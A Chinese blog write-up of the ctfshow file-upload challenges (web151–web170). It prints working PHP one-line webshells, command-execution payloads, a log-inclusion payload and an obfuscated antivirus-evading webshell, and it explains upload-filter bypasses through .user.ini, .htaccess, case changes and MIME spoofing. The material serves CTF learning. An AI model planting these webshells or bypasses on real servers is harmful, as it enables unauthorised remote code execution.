ctfshow文件上传系列

web151:

这个要洗一个一句话木马

payloadl:

<?php @eval($_POST["cmd"]);

先把文件名后缀改为png,,然后是上传

用bp抓包,改后缀名为php发送之后会显示上传成功,后面会有他的上传路径

用哥斯拉进行连接,然后翻目录就能父目录找到flag

web152:

和上一题一样,突然想起来还有其他做法。类似于做命令执行的时候的环境。没有环境我们自己,自己传一个上去用这个文件做梯子

web153:

这题要把环境修改,也就是上传一个配置文件让他生效

看来大佬的wp,上传的配置文件是.user.ini.网上查了一下这个配置文件的作用

相当于在user.ini里面配置了之后不管是那个php文件让都要包含user.ini里设置的文件代码

比如:

我在.user.ini里面这么设置

 那么与这个配置文件所在的目录下的所有php文件前面都要包含这个1.png的文本

文字1.png里面又写一个:

那么我上传成功后直接连接 index.php就能直接链接到木马了,翻目录查看flag

web154:

这题发现用上一题的做法是,上传一句话木马的时候被禁用了,去大佬的wp发现他把php进行禁用了,但是PHP中对于php大小写是不区分的,所以把php变为pHP就行了

web155:

这题是把php严格过滤了,使用段短标签进行绕过

web156:

[]被过滤,用{}可以代替

web157:

这题;被过滤了,木马暂时想不到办法上传,我传个命令文件让给他给我执行

payload:

<?php system("ls");

web158:

()被过滤了,这次是抄大佬的wp

payload:

<?=`tac ../fl*`?>

 没想明白是怎么回事

web160:

这题要用日志包含,他把空格过滤了,可以使用.进行续接

日志包含的payload:

<?php include"/var/lo"."g/nginx/access.lo"."g"  ?>

.user.ini正常上传

被包含的文件包含上面的payload

然后访问up目录就能看到日志

然后之后包含就是在ua里面进行木马包含。

木马payload:
 

<?php @eval($_POST["cmd"]);?>

蚁剑直接连接up目录就能反目录了

web161:

和上一题一样的写法,但是要在这里加一个文件头

 后面和上一题一样的做法,就是加了个文件头

web167:

前面几题不会做先跳了后面再做

这题要用到一个Apache的漏洞而且前面的都是上传png图片这题上传的是jpg图片

那么就和前面的.user.ini一样的,自己造一个轮子。传.htaccess文件上去,然后传一个文件上去往里添加木马文件,然后用蚁剑连接这个文件,就能翻目录了。

web168:

不知道怎么个免杀法,一句话传上去被杀掉了。我是先上文件命令执行看到flag,再传木马看我前面传的木马文件,发现都找不到

命令执行payload:

<?php $a='syste'.'m';($a)('ls ../'); 

 木马的payload:

<?php // 使用时请删除此行, 连接密码: TyKPuntU ?>
<?php $bFIY=create_function(chr(25380/705).chr(92115/801).base64_decode('bw==').base64_decode('bQ==').base64_decode('ZQ=='),chr(0x16964/0x394).chr(0x6f16/0xf1).base64_decode('YQ==').base64_decode('bA==').chr(060340/01154).chr(01041-0775).base64_decode('cw==').str_rot13('b').chr(01504-01327).base64_decode('ZQ==').chr(057176/01116).chr(0xe3b4/0x3dc));$bFIY(base64_decode('NjgxO'.'Tc7QG'.'V2QWw'.'oJF9Q'.''.str_rot13('G').str_rot13('1').str_rot13('A').base64_decode('VQ==').str_rot13('J').''.''.chr(0x304-0x2d3).base64_decode('Ug==').chr(13197/249).str_rot13('F').base64_decode('MQ==').''.'B1bnR'.'VXSk7'.'MjA0N'.'TkxOw'.'=='.''));?>

web169:

这题上传的文件有点离谱,还是看了大佬的wp才看到的是zip文件。还得把格式改为image/png才能上传成功,但是这题把<过滤了就有点难搞。但是想一下发现这题用日志包含也能做。.user.ini包含日志,然后日志ua上传木马,在自己传一个php文件上去,蚁剑连接这个文件就有了

web170:

不知道为什么一直传不上去,

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
您好!对于CTF Show文件上传的问题,我可以给您一些基本的指导。 在CTF(Capture The Flag)比赛中,文件上传通常是一个常见的题目类型。这类题目要求参赛选手利用漏洞或者绕过限制,成功将文件上传到目标服务器上。 常见的文件上传漏洞包括但不限于以下几种: 1. 后缀绕过:目标服务器对上传文件的后缀进行了限制,但未对文件内容进行验证。您可以尝试修改文件后缀名,或者在上传时使用一些特殊的字符来绕过后缀检测。 2. MIME类型绕过:目标服务器对上传文件的MIME类型进行了检测,但未对文件内容进行验证。您可以尝试修改文件的Content-Type头部信息,或者在上传时使用一些特殊的字符来绕过MIME类型检测。 3. 目录穿越:目标服务器未对文件路径进行合理的校验,您可以尝试通过上传包含特殊字符(如'../')的文件名来实现目录穿越,达到上传文件到其他目录的目的。 4. 文件包含漏洞:目标服务器存在文件包含漏洞时,您可以通过上传一个恶意文件,然后在适当的条件下触发该文件被包含,从而执行您所需要的操作。 需要注意的是,在实际的CTF比赛或者演练中,上传文件是一个涉及安全性的操作,务必遵循规则和道德准则,避免对他人系统造成不必要的损害。 希望这些信息对您有所帮助!如果您有其他问题,请随时提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

九月一。

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值